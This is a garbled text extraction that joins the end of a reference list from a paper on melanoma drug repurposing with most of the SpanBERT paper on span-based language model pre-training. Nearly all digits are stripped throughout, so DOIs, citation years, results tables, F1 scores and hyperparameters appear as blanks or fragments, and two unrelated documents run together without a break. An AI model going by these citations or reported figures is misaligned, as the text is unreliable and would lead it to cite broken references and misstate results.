national cancer institute. . carboplatin and paclitaxel with or without sorafenib tosylate in treating patients with stage iii or stage iv melanoma that cannot be removed by surgery. available at https://clinicaltrials.gov/ct /show/nct (accessed january ). pagel p, kovac s, oesterheld m, brauner b, dunger-kaltenbach i, frishman g, montrone c, mark p, stümpflen v, mewes h-w, ruepp a, frishman d. . the mips mammalian protein-protein interaction database. bioinformatics ( ): – doi . /bioinformatics/bti . pardo oe, wellbrock c, khanzada uk, aubert m, arozarena i, davidson s, bowen f, parker pj, filonenko vv, gout it, sebire n, marais r, downward j, seckl mj. . fgf- protects small cell lung cancer cells from apoptosis through a complex involving pkcepsilon, b-raf and s k . embo journal ( ): – doi . /sj.emboj. . patel k, doudican na, schiff pb, orlow sj. . albendazole sensitizes cancer cells to ionizing radiation. radiation oncology ( ): doi . / - x- - . peng x, wang f, li l, bum-erdene k, xu d, wang b, sinn aa, pollok ke, sandusky ge, li l, turchi jj, jalal si, meroueh so. . exploring a structural protein–drug interactome for new therapeutics in lung cancer. molecular biosystems ( ): doi . /c mb j. razick s, magklaras g, donaldson im. . irefindex: a consolidated protein interaction database with provenance. bmc bioinformatics ( ): doi . / - - - . richard c, david w, markus l. . rdf . concepts and abstract syntax. w c recommendation. available at https://www.w .org/tr/rdf -concepts/. ruepp a, waegele b, lechner m, brauner b, dunger-kaltenbach i, fobo g, frishman g, montrone c, mewes h-w. . corum: the comprehensive resource of mammalian protein complexes— . nucleic acids research (suppl ):d –d doi . /nar/gkp . sanseau p, koehler j. . editorial: computational methods for drug repurposing. briefings in bioinformatics ( ): – doi . /bib/bbr . sawada n, kataoka k, kondo k, arimochi h, fujino h, takahashi y, miyoshi t, kuwahara t, monden y, ohnishi y. . betulinic acid augments the inhibitory effects of vincristine on growth and lung metastasis of b f melanoma cells in mice. british journal of cancer ( ): – doi . /sj.bjc. . scott wa. . reliability of content analysis: the case of nominal scale coding. public opinion quarterly ( ): – doi . / . shen m, zhang y, saba n, austin cp, wiestner a, auld ds. . identification of therapeutic candidates for chronic lymphocytic leukemia from a library of approved drugs. plos one ( ):e doi . /journal.pone. . sirota m, dudley jt, kim j, chiang ap, morgan aa, sweet-cordero a, sage j, butte aj. . discovery and preclinical validation of drug indications using compendia of public gene expression data. science translational medicine ( ): ra doi . /scitranslmed. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - https://www.w .org/tr/owl -direct-semantics/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jca. . https://clinicaltrials.gov/ct /show/nct http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /sj.emboj. http://dx.doi.org/ . / - x- - http://dx.doi.org/ . /c mb j http://dx.doi.org/ . / - - - https://www.w .org/tr/rdf -concepts/ http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /bib/bbr http://dx.doi.org/ . /sj.bjc. http://dx.doi.org/ . / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /scitranslmed. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ skrabanek l, saini hk, bader gd, enright aj. . computational prediction of protein- protein interactions. molecular biotechnology ( ): – doi . /s - - - . smalley ksm, contractor r, haass nk, kulp an, atilla-gokcumen ge, williams ds, bregman h, flaherty kt, soengas ms, meggers e, herlyn m. . an organometallic protein kinase inhibitor pharmacologically activates p and induces apoptosis in human melanoma cells. cancer research ( ): – doi . / - .can- - . sprinzak e, sattath s, margalit h. . how reliable are experimental protein–protein interaction data? journal of molecular biology ( ): – doi . /s - ( ) - . stark c, breitkreutz b-j, reguly t, boucher l, breitkreutz a, tyers m. . biogrid: a general repository for interaction datasets. nucleic acids research (suppl ):d –d doi . /nar/gkj . vogt i, prinz j, campillos m. . molecularly and clinically related drugs and diseases are enriched in phenotypically similar drug-disease pairs. genome medicine ( ): doi . /s - - -z. whitehead rp, moon j, mccachren ss, hersh em, samlowski we, beck jt, tchekmedyian ns, sondak vk. . a phase ii trial of vinorelbine tartrate in patients with disseminated malignant melanoma and one prior systemic therapy. cancer ( ): – doi . /cncr. . wilkinson m, vandervalk b, mccarthy l. . sadi semantic web services–cause you can’t always getwhat you want! in: ieee asia-pacific services computing conference (apscc). singapore: ieee, – . wishart ds, knox c, guo ac, shrivastava s, hassanali m, stothard p, chang z, woolsey j. . drugbank: a comprehensive resource for in silico drug discovery and exploration. nucleic acids research (suppl ):d –d doi . /nar/gkj . wu c, gudivada rc, aronow bj, jegga ag. . computational drug repositioning through heterogeneous network clustering. bmc systems biology (suppl ):s doi . / - - -s -s . wu z, wang y, chen l. . network-based drug repositioning. molecular biosystems ( ): – doi . /c mb a. xenarios i, salwinski l, duan xj, higney p, kim s-m, eisenberg d. . dip, the database of interacting proteins: a research tool for studying cellular networks of protein interactions. nucleic acids research ( ): – doi . /nar/ . . . yang l, agarwal p. . systematic drug repositioning based on clinical side-effects. plos one ( ):e doi . /journal.pone. . ye h, liu q, wei j. . construction of drug network based on side effects and its application for drug repositioning. plos one ( ):e doi . /journal.pone. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - .can- - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /nar/gkj http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /cncr. http://dx.doi.org/ . /nar/gkj http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ finding melanoma drugs through a probabilistic knowledge graph introduction results discussion materials and methods flink references spanbert: improving pre-training by representing and predicting spans mandar joshi∗† danqi chen∗‡§ yinhan liu§ daniel s. weld†� luke zettlemoyer†§ omer levy§ † allen school of computer science & engineering, university of washington, seattle, wa {mandar ,weld,lsz}@cs.washington.edu ‡ computer science department, princeton university, princeton, nj danqic@cs.princeton.edu � allen institute of artificial intelligence, seattle {danw}@allenai.org § facebook ai research, seattle {danqi,yinhanliu,lsz,omerlevy}@fb.com abstract we present spanbert, a pre-training method that is designed to better represent and predict spans of text. our approach extends bert by ( ) masking contiguous random spans, rather than random tokens, and ( ) training the span boundary representations to predict the entire content of the masked span, without relying on the individual token representations within it. spanbert consistently outperforms bert and our better-tuned baselines, with substantial gains on span selection tasks such as question answering and coreference reso- lution. in particular, with the same training data and model size as bertlarge, our single model obtains . % and . % f on squad . and . respectively. we also achieve a new state of the art on the ontonotes coreference resolution task ( . % f ), strong perfor- mance on the tacred relation extraction benchmark, and even gains on glue. introduction pre-training methods like bert (devlin et al., ) have shown strong performance gains using self-supervised training that masks individual words or subword units. however, many nlp tasks in- volve reasoning about relationships between two or more spans of text. for example, in extractive question answering (rajpurkar et al., ), de- ∗equal contribution. our code and pre-trained models are available at https:// github.com/facebookresearch/spanbert. termining that the ‘‘denver broncos’’ is a type of ‘‘nfl team’’ is critical for answering the ques- tion ‘‘which nfl team won super bowl ?’’ such spans provide a more challenging target for self supervision tasks, for example, predicting ‘‘denver broncos’’ is much harder than predicting only ‘‘denver’’ when you know the next word is ‘‘broncos’’. in this paper, we introduce a span- level pretraining approach that consistently out- performs bert, with the largest gains on span selection tasks such as question answering and coreference resolution. we present spanbert, a pre-training method that is designed to better represent and predict spans of text. our method differs from bert in both the masking scheme and the training objec- tives. first, we mask random contiguous spans, rather than random individual tokens. second, we introduce a novel span-boundary objective (sbo) so the model learns to predict the entire masked span from the observed tokens at its boundary. span-based masking forces the model to predict entire spans solely using the context in which they appear. furthermore, the sbo encourages the model to store this span-level information at the boundary tokens, which can be easily accessed during the fine-tuning stage. figure illustrates our approach. to implement spanbert, we build on a well- tuned replica of bert, which itself substantially outperforms the original bert. while building on our baseline, we find that pre-training on single segments, instead of two half-length segments with the next sentence prediction (nsp) objective, transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: radu florian. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/facebookresearch/spanbert https://github.com/facebookresearch/spanbert https://doi.org/ . /tacl_a_ figure : an illustration of spanbert training. the span an american football game is masked. the sbo uses the output representations of the boundary tokens, x and x (in blue), to predict each token in the masked span. the equation shows the mlm and sbo loss terms for predicting the token, football (in pink), which as marked by the position embedding p , is the third token from x . considerably improves performance on most downstream tasks. therefore, we add our modifi- cations on top of the tuned single-sequence bert baseline. together, our pre-training process yields mod- els that outperform all bert baselines on a wide variety of tasks, and reach substantially better performance on span selection tasks in par- ticular. specifically, our method reaches . % and . % f on squad . and . (rajpurkar et al., , ), respectively—reducing error by as much as % compared with our tuned bert replica. we also observe similar gains on five additional extractive question answering benchmarks (newsqa, triviaqa, searchqa, hotpotqa, and natural questions). spanbert also arrives at a new state of the art on the challenging conll- (‘‘ontonotes’’) shared task for document-level coreference resolu- tion, where we reach . % f , exceeding the pre- vious top model by . % absolute. finally, we demonstrate that spanbert also helps on tasks that do not explicitly involve span selec- tion, and show that our approach even im- proves performance on tacred (zhang et al., ) and glue (wang et al., ). whereas others show the benefits of adding more data (yang et al., ) and increasing model size (lample and conneau, ), this work demonstrates the importance of designing we use the modified mrqa version of these datasets. see more details in section . . good pre-training tasks and objectives, which can also have a remarkable impact. background: bert bert (devlin et al., ) is a self-supervised approach for pre-training a deep transformer en- coder (vaswani et al., ), before fine-tuning it for a particular downstream task. bert opti- mizes two training objectives—masked language model (mlm) and next sentence prediction (nsp)— which only require a large collection of unlabeled text. notation given a sequence of word or sub- word tokens x = (x , x , . . . , xn), bert trains an encoder that produces a contextualized vector representation for each token: enc(x , x , . . . , xn) = x , x , . . . , xn. masked language model also known as a cloze test, mlm is the task of predicting missing tokens in a sequence from their placeholders. specifically, a subset of tokens y ⊆ x is sampled and substituted with a different set of tokens. in bert’s implementation, y accounts for % of the tokens in x; of those, % are replaced with [mask], % are replaced with a random token (according to the unigram distribution), and % are kept unchanged. the task is to predict the original tokens in y from the modified input. bert selects each token in y independently by randomly selecting a subset. in spanbert, we define y by randomly selecting contiguous spans (section . ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april next sentence prediction the nsp task takes two sequences (xa, xb) as input, and predicts whether xb is the direct continuation of xa. this is implemented in bert by first reading xa from the corpus, and then ( ) either reading xb from the point where xa ended, or ( ) randomly sampling xb from a different point in the corpus. the two sequences are separated by a special [sep] token. additionally, a special [cls] token is added to xa, xb to form the input, where the target of [cls] is whether xb indeed follows xa in the corpus. in summary, bert optimizes the mlm and the nsp objectives by masking word pieces uniformly at random in data generated by the bi-sequence sampling procedure. in the next section, we will present our modifications to the data pipeline, masking, and pre-training objectives. model we present spanbert, a self-supervised pre- training method designed to better represent and predict spans of text. our approach is inspired by bert (devlin et al., ), but deviates from its bi-text classification framework in three ways. first, we use a different random process to mask spans of tokens, rather than individual ones. we also introduce a novel auxiliary objective—the sbo—which tries to predict the entire masked span using only the representations of the tokens at the span’s boundary. finally, spanbert samples a single contiguous segment of text for each train- ing example (instead of two), and thus does not use bert’s next sentence prediction objective, which we omit. . span masking given a sequence of tokens x = (x , x , . . . , xn), we select a subset of tokens y ⊆ x by iteratively sampling spans of text until the masking budget (e.g., % of x) has been spent. at each iteration, we first sample a span length (number of words) from a geometric distribution � ∼ geo(p), which is skewed towards shorter spans. we then ran- domly (uniformly) select the starting point for the span to be masked. we always sample a sequence of complete words (instead of subword tokens) and the starting point must be the beginning of one word. following preliminary trials, we set we experimented with p = { . , . , . } and found . to perform the best. figure : we sample random span lengths from a geometric distribution � ∼ geo(p = . ) clipped at �max = . p = . , and also clip � at �max = . this yields a mean span length of mean (�) = . . figure shows the distribution of span mask lengths. as in bert, we also mask % of the tokens in total: replacing % of the masked tokens with [mask], % with random tokens, and % with the original tokens. however, we perform this replacement at the span level and not for each token individually; that is, all the tokens in a span are replaced with [mask] or sampled tokens. . span boundary objective span selection models (lee et al., , ; he et al., ) typically create a fixed-length representation of a span using its boundary tokens (start and end). to support such models, we would ideally like the representations for the end of the span to summarize as much of the internal span content as possible. we do so by introducing a span boundary objective that involves predicting each token of a masked span using only the representations of the observed tokens at the boundaries (figure ). formally, we denote the output of the trans- former encoder for each token in the sequence by x , . . . , xn. given a masked span of tokens (xs, . . . , xe) ∈ y , where (s, e) indicates its start and end positions, we represent each token xi in the span using the output encodings of the external boundary tokens xs− and xe+ , as well as the position embedding of the target token pi−s+ : yi = f(xs− , xe+ , pi−s+ ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april where position embeddings p , p , . . . mark rela- tive positions of the masked tokens with respect to the left boundary token xs− . we implement the representation function f(·) as a -layer feed-forward network with gelu activations (hendrycks and gimpel, ) and layer normal- ization (ba et al., ): h = [xs− ; xe+ ; pi−s+ ] h = layernorm (gelu(w h )) yi = layernorm (gelu(w h )) we then use the vector representation yi to predict the token xi and compute the cross-entropy loss exactly like the mlm objective. spanbert sums the loss from both the span boundary and the regular masked language model objectives for each token xi in the masked span (xs, . . . , xe), while reusing the input embedding (press and wolf, ) for the target tokens in both mlm and sbo: l(xi) = lmlm(xi) + lsbo(xi) = − log p (xi | xi) − log p (xi | yi) . single-sequence training as described in section , bert’s examples con- tain two sequences of text (xa, xb), and an objective that trains the model to predict whether they are connected (nsp). we find that this set- ting is almost always worse than simply using a single sequence without the nsp objective (see section for further details). we conjecture that single-sequence training is superior to bi-sequence training with nsp because (a) the model benefits from longer full-length contexts, or (b) condi- tioning on, often unrelated, context from an- other document adds noise to the masked language model. therefore, in our approach, we remove both the nsp objective and the two-segment sam- pling procedure, and simply sample a single con- tiguous segment of up to n = tokens, rather than two half-segments that sum up to n tokens together. in summary, spanbert pre-trains span repre- sentations by: ( ) masking spans of full words using a geometric distribution based masking scheme (section . ), ( ) optimizing an auxiliary span-boundary objective (section . ) in addition to mlm using a single-sequence data pipeline (section . ). a procedural description can be found in appendix a. experimental setup . tasks we evaluate on a comprehensive suite of tasks, including seven question answering tasks, coref- erence resolution, nine tasks in the glue bench- mark (wang et al., ), and relation extraction. we expect that the span selection tasks, question answering and coreference resolution, will partic- ularly benefit from our span-based pre-training. extractive question answering given a short passage of text and a question as input, the task of extractive question answering is to select a contiguous span of text in the passage as the answer. we first evaluate on squad . and . (rajpurkar et al., , ), which have served as major question answering benchmarks, particularly for pre-trained models (peters et al., ; devlin et al., ; yang et al., ). we also evaluate on five more datasets from the mrqa shared task (fisch et al., ) : newsqa (trischler et al., ), searchqa (dunn et al., ), triviaqa (joshi et al., ), hotpotqa (yang et al., ), and natural questions (kwiatkowski et al., ). because the mrqa shared task does not have a public test set, we split the development set in half to make new development and test sets. the datasets vary in both domain and collection meth- odology, making this collection a good test bed for evaluating whether our pre-trained models can generalize well across different data distributions. following bert (devlin et al., ), we use the same qa model architecture for all the data- sets. we first convert the passage p = (p , p , . . . , pl) and question q = (q , q , . . . , ql′) into a single sequence x = [cls]p p . . . pl[sep] q q . . . ql′[sep], pass it to the pre-trained trans- former encoder, and train two linear classifiers independently on top of it for predicting the answer span boundary (start and end). for the unanswer- able questions in squad . , we simply set the https://github.com/mrqa/mrqa-shared- task- . mrqa changed the original datasets to unify them into the same format, e.g., all the contexts are truncated to a maximum of tokens and only answerable questions are kept. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/mrqa/mrqa-shared-task- https://github.com/mrqa/mrqa-shared-task- answer span to be the special token [cls] for both training and testing. coreference resolution coreference resolu- tion is the task of clustering mentions in text which refer to the same real-world entities. we evaluate on the conll- shared task (pradhan et al., ) for document-level coreference resolu- tion. we use the independent version of the joshi et al. ( b) implementation of the higher-order coreference model (lee et al., ). the docu- ment is divided into non-overlapping segments of a pre-defined length. each segment is encoded independently by the pre-trained transformer encoder, which replaces the original lstm-based encoder. for each mention span x, the model learns a distribution p(·) over possible antecedent spans y : p(y) = es(x,y) ∑ y′∈y e s(x,y′) the span pair scoring function s(x, y) is a feed- forward neural network over fixed-length span representations and hand-engineered features over x and y: s(x, y) = sm(x) + sm(y) + sc(x, y) sm(x) = ffnn m(gx) sc(x, y) = ffnn c(gx, gy, φ(x, y)) here gx and gy denote the span representations, which are a concatenation of the two transformer output states of the span endpoints and an attention vector computed over the output representations of the token in the span. ffnnm and ffnnc represent two feedforward neural networks with one hidden layer, and φ(x, y) represents the hand- engineered features (e.g., speaker and genre infor- mation). a more detailed description of the model can be found in joshi et al. ( b). relation extraction tacred (zhang et al., ) is a challenging relation extraction dataset. given one sentence and two spans within it— subject and object—the task is to predict the relation between the spans from pre-defined relation types, including no relation. we follow the entity masking schema from zhang et al. ( ) and replace the subject and object entities by their ner tags such as ‘‘[cls][subj-per] the length was chosen from { , , , }. see more details in appendix b. was born in [obj-loc] , michigan, . . . ’’, and finally add a linear classifier on top of the [cls] token to predict the relation type. glue the general language understanding evaluation (glue) benchmark (wang et al., ) consists of sentence-level classification tasks: • two sentence-level classification tasks in- cluding cola (warstadt et al., ) for evaluating linguistic acceptability and sst- (socher et al., ) for sentiment classification. • three sentence-pair similarity tasks includ- ing mrpc (dolan and brockett, ), a binary paraphrasing task sentence pairs from news sources, sts-b (cer et al., ), a graded similarity task for news headlines, and qqp, a binary paraphrasing tasking be- tween quora question pairs. • four natural language inference tasks in- cluding mnli (williams et al., ), qnli (rajpurkar et al., ), rte (dagan et al., ; bar-haim et al., ; giampiccolo et al., ), and wnli (levesque et al., ). unlike question answering, coreference resolu- tion, and relation extraction, these sentence-level tasks do not require explicit modeling of span- level semantics. however, they might still benefit from implicit span-based reasoning (e.g., the prime minister is the head of the government). following previous work (devlin et al., ; radford et al., ), we exclude wnli from the results to enable a fair comparison. although recent work liu et al. ( a) has applied several task-specific strategies to increase performance on the individual glue tasks, we follow bert’s single-task setting and only add a linear classi- fier on top of the [cls] token for these classifi- cation tasks. . implementation we reimplemented bert’s model and pre- training method in fairseq (ott et al., ). https://data.quora.com/first-quora- dataset-release-question-pairs. previous work has excluded wnli on account of con- struction issues outlined on the glue website – https:// gluebenchmark.com/faq. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://data.quora.com/first-quora-dataset-release-question-pairs https://data.quora.com/first-quora-dataset-release-question-pairs https://gluebenchmark.com/faq https://gluebenchmark.com/faq we used the model configuration of bertlarge as in devlin et al. ( ) and also pre-trained all our models on the same corpus: bookscorpus and english wikipedia using cased wordpiece tokens. compared with the original bert implemen- tation, the main differences in our implementation include: (a) we use different masks at each epoch while bert samples different masks for each sequence during data processing. (b) we remove all the short-sequence strategies used before (they sampled shorter sequences with a small proba- bility . ; they also first pre-trained with smaller sequence length of for % of the steps). instead, we always take sequences of up to tokens until it reaches a document boundary. we refer readers to liu et al. ( b) for further dis- cussion on these modifications and their effects. as in bert, the learning rate is warmed up over the first , steps to a peak value of e- , and then linearly decayed. we retain β hyper- parameters (β = . , β = . ) and a de- coupled weight decay (loshchilov and hutter, ) of . . we also keep a dropout of . on all layers and attention weights, and a gelu ac- tivation function (hendrycks and gimpel, ). we deviate from the optimization by running for . m steps and using an epsilon of e- for adamw (kingma and ba, ), which con- verges to a better set of model parameters. our im- plementation uses a batch size of sequences with a maximum of tokens. for the sbo, we use dimension position embeddings p , p , . . . to mark positions relative to the left boundary token. the pre-training was done on volta v gpus and took days to complete. fine-tuning is implemented based on hugging- face’s codebase (wolf et al., ) and more details are given in appendix b. . baselines we compare spanbert to three baselines: google bert the pre-trained models released by devlin et al. ( ). our bert our reimplementation of bert with improved data preprocessing and optimiza- tion (section . ). on the average, this is approximately sequences, because some documents have fewer than tokens. https://github.com/google-research/bert. squad . squad . em f em f human perf. . . . . google bert . . . . our bert . . . . our bert- seq . . . . spanbert . . . . table : test results on squad . and squad . . our bert- seq our reimplementation of bert trained on single full-length sequences without nsp (section . ). results we compare spanbert to the baselines per task, and draw conclusions based on the overall trends. . per-task results extractive question answering table shows the performance on both squad . and . . spanbert exceeds our bert baseline by . % and . % f , respectively ( . % and . % over google bert). in squad . , this result ac- counts for over % error reduction, reaching . % f above human performance. table demonstrates that this trend goes be- yond squad, and is consistent in every mrqa dataset. on average, we see a . % f improve- ment from our reimplementation of bert. al- though some gains are coming from single-sequence training (+ . %), most of the improvement stems from span masking and the span boundary objec- tive (+ . %), with particularly large gains on triviaqa (+ . %) and hotpotqa (+ . %). coreference resolution table shows the performance on the ontonotes coreference res- olution benchmark. our bert reimplementation improves the google bert model by . % on the average f metric and single-sequence train- ing brings another . % gain. finally, spanbert improves considerably on top of that, achieving a new state of the art of . % f (previous best result is . %). relation extraction table shows the perfor- mance on tacred. spanbert exceeds our reimplementation of bert by . % f and achieves close to the current state of the art (soares et al., )—our model performs better than downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/google-research/bert newsqa triviaqa searchqa hotpotqa natural questions avg. google bert . . . . . . our bert . . . . . . our bert- seq . . . . . . spanbert . . . . . . table : performance (f ) on the five mrqa extractive question answering tasks. muc b ceafφ p r f p r f p r f avg. f prev. sota: (lee et al., ) . . . . . . . . . . google bert . . . . . . . . . . our bert . . . . . . . . . . our bert- seq . . . . . . . . . . spanbert . . . . . . . . . . table : performance on the ontonotes coreference resolution benchmark. the main evaluation is the average f of three metrics: muc, b , and ceafφ on the test set. p r f bertem(soares et al., ) − − . bertem+mtb∗ − − . google bert . . . our bert . . . our bert- seq . . . spanbert . . . table : test performance on the tacred relation extraction benchmark. bertlarge and bertem+mtb from soares et al. ( ) are the current state-of-the-art. ∗: bertem+mtb incor- porated an intermediate ‘‘matching the blanks’’ pre-training on the entity-linked text based on english wikipedia, which is not a direct compar- ison to ours trained only from raw text. their bertem but is . point behind bertem + mtb, which used entity-linked text for additional pre-training. most of this gain (+ . %) stems from single-sequence training although the contribution of span masking and the span boundary objective is still a considerable . %, resulting largely from higher recall. glue table shows the performance on glue. for most tasks, the different models appear to perform similarly. moving to single-sequence training without the nsp objective substantially improves cola, and yields smaller (but consid- erable) improvements on mrpc and mnli. the main gains from spanbert are in the squad- based qnli dataset (+ . %) and in rte (+ . %), the latter accounting for most of the rise in spanbert’s glue average. . overall trends we compared our approach to three bert base- lines on benchmarks, and found that spanbert outperforms bert on almost every task. in tasks, spanbert performed better than all base- lines. in two tasks (mrpc and qqp), it performed on-par in terms of accuracy with single-sequence trained bert, but still outperformed the other baselines. in one task (sst- ), google’s bert baseline performed better than spanbert by . % accuracy. when considering the magnitude of the gains, it appears that spanbert is especially better at extractive question answering. in squad . , for example, we observe a solid gain of . % f even though the baseline is already well above human performance. on mrqa, spanbert im- proves between . % (natural questions) and . % (triviaqa) f on top of our bert baseline. finally, we observe that single-sequence train- ing works considerably better than bi-sequence downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april cola sst- mrpc sts-b qqp mnli qnli rte (avg) google bert . . . / . . / . . / . . / . . . . our bert . . . / . . / . . / . . / . . . . our bert- seq . . . / . . / . . / . . / . . . . spanbert . . . / . . / . . / . . / . . . . table : test set performance on glue tasks. mrpc: f /accuracy, sts-b: pearson/spearmanr correlation, qqp: f /accuracy, mnli: matched/mistached accuracies, and accuracy for all the other tasks. wnli (not shown) is always set to majority class ( . % accuracy) and included in the average. training with nsp with bert’s choice of se- quence lengths for a wide variety of tasks. this is surprising because bert’s ablations showed gains from the nsp objective (devlin et al., ). however, the ablation studies still involved bi- sequence data processing (i.e., the pre-training stage only controlled for the nsp objective while still sampling two half-length sequences). we hy- pothesize that bi-sequence training, as it is im- plemented in bert (see section ), impedes the model from learning longer-range features, and consequently hurts performance on many down- stream tasks. ablation studies we compare our random span masking scheme with linguistically-informed masking schemes, and find that masking random spans is a com- petitive and often better approach. we then study the impact of the sbo, and contrast it with bert’s nsp objective. . masking schemes previous work (sun et al., ) has shown im- provements in downstream task performance by masking linguistically informed spans during pre- training for chinese data. we compare our ran- dom span masking scheme with masking of linguistically informed spans. specifically, we train the following five baseline models differing only in the way tokens are masked. subword tokens we sample random word- piece tokens, as in the original bert. whole words we sample random words, and then mask all of the subword tokens in those words. the total number of masked subtokens is around %. to save time and resources, we use the checkpoints at . m steps for all the ablation experiments. named entities at % of the time, we sample from named entities in the text, and sample random whole words for the other %. the total number of masked subtokens is %. specifically, we run spacy’s named entity recognizer (honnibal and montani, ) on the corpus and select all the non-numerical named entity mentions as candidates. noun phrases similar to named entities, we sample from noun phrases at % of the time. the noun phrases are extracted by running spacy’s constituency parser. geometric spans we sample random spans from a geometric distribution, as in our spanbert (see section . ). table shows how different pre-training masking schemes affect performance on the devel- opment set of a selection of tasks. all the mod- els are evaluated on the development sets and are based on the default bert setup of bi-sequence training with nsp; the results are not directly com- parable to the main evaluation. with the exception of coreference resolution, masking random spans is preferable to other strategies. although linguis- tic masking schemes (named entities and noun phrases) are often competitive with random spans, their performance is not consistent; for instance, masking noun phrases achieves parity with ran- dom spans on newsqa, but underperforms on triviaqa (− . % f ). on coreference resolution, we see that masking random subword tokens is preferable to any form of span masking. nevertheless, we shall see in the following experiment that combining random span masking with the span boundary objective can improve upon this result considerably. . auxiliary objectives in section , we saw that bi-sequence training with the nsp objective can hurt performance on https://spacy.io/. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://spacy.io/ squad . newsqa triviaqa coreference mnli-m qnli glue (avg) subword tokens . . . . . . . whole words . . . . . . . named entities . . . . . . . noun phrases . . . . . . . geometric spans . . . . . . . table : the effect of replacing bert’s original masking scheme (subword tokens) with different masking schemes. results are f scores for qa tasks and accuracy for mnli and qnli on the development sets. all the models are based on bi-sequence training with nsp. squad . newsqa triviaqa coref mnli-m qnli glue (avg) span masking ( seq) + nsp . . . . . . . span masking ( seq) . . . . . . . span masking ( seq) + sbo . . . . . . . table : the effects of different auxiliary objectives, given mlm over random spans as the primary objective. downstream tasks, when compared with single- sequence training. we test whether this holds true for models pre-trained with span masking, and also evaluate the effect of replacing the nsp objective with the sbo. table confirms that single-sequence training typically improves performance. adding sbo fur- ther improves performance, with a substantial gain on coreference resolution (+ . % f ) over span masking alone. unlike the nsp objective, sbo does not appear to have any adverse effects. related work pre-trained contextualized word representations that can be trained from unlabeled text (dai and le, ; melamud et al., ; peters et al., ) have had immense impact on nlp lately, partic- ularly as methods for initializing a large model before fine-tuning it for a specific task (howard and ruder, ; radford et al., ; devlin et al., ). beyond differences in model hyper- parameters and corpora, these methods mainly differ in their pre-training tasks and loss functions, with a considerable amount of contemporary liter- ature proposing augmentations of bert’s mlm objective. while previous and concurrent work has looked at masking (sun et al., ) or dropping (song et al., ; chan et al., ) multiple words from the input—particularly as pretraining for lan- guage generation tasks—spanbert pretrains span representations (lee et al., ), which are widely used for question answering, coreference resolution, and a variety of other tasks. ernie (sun et al., ) shows improvements on chinese nlp tasks using phrase and named entity mask- ing. mass (song et al., ) focuses on language generation tasks, and adopts the encoder-decoder framework to reconstruct a sentence fragment given the remaining part of the sentence. we attempt to more explicitly model spans using the sbo objective, and show that (geometrically dis- tributed) random span masking works as well, and sometimes better than, masking linguistically- coherent spans. we evaluate on english bench- marks for question answering, relation extraction, and coreference resolution in addition to glue. a different ernie (zhang et al., ) fo- cuses on integrating structured knowledge bases with contextualized representations with an eye on knowledge-driven tasks like entity typing and re- lation classification. unilm (dong et al., ) uses multiple language modeling objectives— unidirectional (both left-to-right and right-to-left), bidirectional, and sequence-to-sequence prediction— to aid generation tasks like summarization and question generation. xlm (lample and conneau, ) explores cross-lingual pre-training for multi- lingual tasks such as translation and cross-lingual classification. kermit (chan et al., ), an in- sertion based approach, fills in missing tokens downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (instead of predicting masked ones) during pre- training; they show improvements on machine translation and zero-shot question answering. concurrent with our work, roberta (liu et al., b) presents a replication study of bert pre-training that measures the impact of many key hyperparameters and training data size. also concurrent, xlnet (yang et al., ) combines an autoregressive loss and the transformer-xl (dai et al., ) architecture with a more than an eight-fold increase in data to achieve current state- of-the-art results on multiple benchmarks. xlnet also masks spans (of – tokens) during pre- training, but predicts them autoregressively. our model focuses on incorporating span-based pre- training, and as a side effect, we present a stronger bert baseline while controlling for the corpus, architecture, and the number of parameters. related to our sbo objective, pair vec (joshi et al., a) encodes word-pair relations using a negative sampling-based multivariate objective during pre-training. later, the word-pair repre- sentations are injected into the attention-layer of downstream tasks, and thus encode limited down- stream context. unlike pair vec, our sbo objec- tive yields ‘‘pair’’ (start and end tokens of spans) representations which more fully encode the con- text during both pre-training and finetuning, and are thus more appropriately viewed as span repre- sentations. stern et al. ( ) focus on improving language generation speed using a block-wise par- allel decoding scheme; they make predictions for multiple time steps in parallel and then back off to the longest prefix validated by a scoring model. also related are sentence representation methods (kiros et al., ; logeswaran and lee, ), which focus on predicting surrounding contexts from sentence embeddings. conclusion we presented a new method for span-based pre- training which extends bert by ( ) masking contiguous random spans, rather than random tokens, and ( ) training the span boundary repre- sentations to predict the entire content of the masked span, without relying on the individual token representations within it. together, our pre- training process yields models that outperform all bert baselines on a variety of tasks, and reach substantially better performance on span selection tasks in particular. appendices a pre-training procedure we describe our pre-training procedure as follows: . divide the corpus into single contiguous blocks of up to tokens. . at each step of pre-training: (a) sample a batch of blocks uniformly at random. (b) mask % of word pieces in each block in the batch using the span masking scheme (section . ). (c) for each masked token xi, opti- mize l(xi) = lmlm(xi) + lsbo(xi) (section . ). b fine-tuning hyperparameters we apply the following fine-tuning hyperparam- eters to all methods, including the baselines. extractive question answering for all the question answering tasks, we use max seq length = and a sliding window of size 